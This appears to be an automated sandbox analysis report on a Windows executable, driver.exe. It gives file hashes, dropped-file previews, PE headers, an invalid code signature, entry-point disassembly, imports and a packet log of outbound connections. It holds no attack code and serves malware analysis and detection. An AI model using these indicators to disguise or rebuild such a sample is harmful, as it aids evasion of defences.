                                                                                                                                                                                                                                              MD5:ACD24F781C0C8F48A0BD86A0E9F2A154
                                                                                                                                                                                                                                              SHA1:93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
                                                                                                                                                                                                                                              SHA-256:5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
                                                                                                                                                                                                                                              SHA-512:7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$*...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y*.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G.*..`-=.w....m..2y.....*o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....
                                                                                                                                                                                                                                              Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):19826
                                                                                                                                                                                                                                              Entropy (8bit):7.454351722487538
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
                                                                                                                                                                                                                                              MD5:455385A0D5098033A4C17F7B85593E6A
                                                                                                                                                                                                                                              SHA1:E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
                                                                                                                                                                                                                                              SHA-256:2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
                                                                                                                                                                                                                                              SHA-512:104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f|..g.7..6..].7B..O..#d..]Ls.k..Le...2.*..&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...*G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,.....*.1.:-....K.......M..;....(,.W.V(^_.....9.,`|...9...>..R...2|.|5.r....n.y>wwU..5...0.J...*.H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...
                                                                                                                                                                                                                                              Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):30005
                                                                                                                                                                                                                                              Entropy (8bit):7.7369400192915085
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
                                                                                                                                                                                                                                              MD5:4D7FE667BCB647FE9F2DA6FC8B95BDAE
                                                                                                                                                                                                                                              SHA1:B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
                                                                                                                                                                                                                                              SHA-256:BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
                                                                                                                                                                                                                                              SHA-512:DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..*%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N.*...5.R...,+...u.~VO...R-......H7..9........].K....]....tS~*.LSi....T....3+........k......i.J.y...,.Y|.N.t.LX.....zu..8......S*7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..
                                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):97
                                                                                                                                                                                                                                              Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                              MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                              SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                              SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                              SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                                              Process:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):311
                                                                                                                                                                                                                                              Entropy (8bit):4.779368010607941
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:Pz58wvmWxHLTSJALTSJALTSrcsWTo6wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:PV8w5pTcgTcgTLs4omvtAFSkIrxMVlmo
                                                                                                                                                                                                                                              MD5:18A051915AD139702C3F18026B231962
                                                                                                                                                                                                                                              SHA1:F73DBC64DD817FAD7D31DBADCA7AA9DAB3188B3B
                                                                                                                                                                                                                                              SHA-256:D5232C8E0D121BB2C051D1671E42A5A7714F60D0C46CBD4172E257D0F6E220AB
                                                                                                                                                                                                                                              SHA-512:CFA51711949D6DCE3C2B6BF2DB650173C8D00F64EB57B30FD7CC569F5EB170CE99A2F977089637F6818F7CD3E7C5E305291DA3C16B39FD3AD170B79A4779E435
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:..Pinging 258555 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.994223648048176
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:driver.exe
                                                                                                                                                                                                                                              File size:8'761'213 bytes
                                                                                                                                                                                                                                              MD5:d368f3959b9a9ff30d34004d99676729
                                                                                                                                                                                                                                              SHA1:21f07b36197be39f6db1cf8ae7d9cb1afc750b48
                                                                                                                                                                                                                                              SHA256:f86f4f262306edd56ac4e433fd053be687ef96f40c7ad7ddf63aae8ec851c499
                                                                                                                                                                                                                                              SHA512:d7f3b35876c8163873b16dbda8065a3ea7cb081b475ae0f06fe78794c426728d63cecedb84eba7b649d7eaae2237a1ebfce8c9be4ed292a7bdb2606d23719da1
                                                                                                                                                                                                                                              SSDEEP:196608:H9DRkd7lwfI9jUCBB7m+mKOY7rXrZu6SELooDmhfvsbnTNWZ:datKIHL7HmBYXrkRoaUNK
                                                                                                                                                                                                                                              TLSH:6196338666D104FAF937A83ED4928E1BCB327D215B70DA97437487754EB39F1082A327
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
                                                                                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                              Entrypoint:0x14000ce20
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x6780E6E4 [Fri Jan 10 09:22:44 2025 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                                              Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                                              • 29/09/2021 02:00:00 29/09/2024 01:59:59
                                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                              • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                                              Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                              Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                              Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                              Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                              call 00007F0D58863ACCh
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                              jmp 00007F0D588636EFh
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                              call 00007F0D58863E98h
                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                              je 00007F0D58863893h
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                              jmp 00007F0D58863877h
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              cmp ecx, eax
                                                                                                                                                                                                                                              je 00007F0D58863886h
                                                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                                              jne 00007F0D58863860h
                                                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                                                              jmp 00007F0D58863869h
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                              test ecx, ecx
                                                                                                                                                                                                                                              jne 00007F0D58863879h
                                                                                                                                                                                                                                              mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                                              call 00007F0D58862FC5h
                                                                                                                                                                                                                                              call 00007F0D588642B0h
                                                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                                                              jne 00007F0D58863876h
                                                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                                                              jmp 00007F0D58863886h
                                                                                                                                                                                                                                              call 00007F0D58870DCFh
                                                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                                                              jne 00007F0D5886387Bh
                                                                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                                                                              call 00007F0D588642C0h
                                                                                                                                                                                                                                              jmp 00007F0D5886385Ch
                                                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                              inc eax
                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              sub esp, 20h
                                                                                                                                                                                                                                              cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                                              mov ebx, ecx
                                                                                                                                                                                                                                              jne 00007F0D588638D9h
                                                                                                                                                                                                                                              cmp ecx, 01h
                                                                                                                                                                                                                                              jnbe 00007F0D588638DCh
                                                                                                                                                                                                                                              call 00007F0D58863E0Eh
                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                              je 00007F0D5886389Ah
                                                                                                                                                                                                                                              test ebx, ebx
                                                                                                                                                                                                                                              jne 00007F0D58863896h
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                                              call 00007F0D58870BC2h
                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x970.rsrc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x858b350x2448
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x764.reloc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .rdata0x2b0000x12a280x12c00d9e0e2f2f3cb9eab7e846be0393eb2b1False0.5243229166666666data5.750785621849544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .rsrc0x470000x9700xa0061a676912f2ddb206cf5c232fb489a14False0.429296875data5.074445172457018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .reloc0x480000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                              RT_VERSION0x470a00x3c0data0.43854166666666666
                                                                                                                                                                                                                                              RT_MANIFEST0x474600x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                              USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                              COMCTL32.dll
                                                                                                                                                                                                                                              KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                                              ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                              GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.145982027 CET4984180192.168.2.5208.95.112.1
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.150933981 CET8049841208.95.112.1192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.151021957 CET4984180192.168.2.5208.95.112.1
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.151107073 CET4984180192.168.2.5208.95.112.1
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.155939102 CET8049841208.95.112.1192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.656667948 CET8049841208.95.112.1192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.706634998 CET4984180192.168.2.5208.95.112.1
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.836596012 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.836627960 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.837143898 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.887939930 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:40.887960911 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.344429970 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.344906092 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.344927073 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.345989943 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.346071005 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.347512960 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.347587109 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.347851992 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.347961903 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.347985983 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348102093 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348141909 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348314047 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348361015 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348489046 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348510027 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348539114 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348551989 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348603010 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348613977 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348634005 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348643064 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348660946 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348679066 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348737955 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348747015 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348767042 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348781109 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348788023 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348797083 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348810911 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348825932 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348854065 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348869085 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348891020 CET49845443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348903894 CET44349845162.159.137.232192.168.2.5
                                                                                                                                                                                                                                              Jan 10, 2025 11:00:41.348995924 CET49845443192.168.2.5162.159.137.232
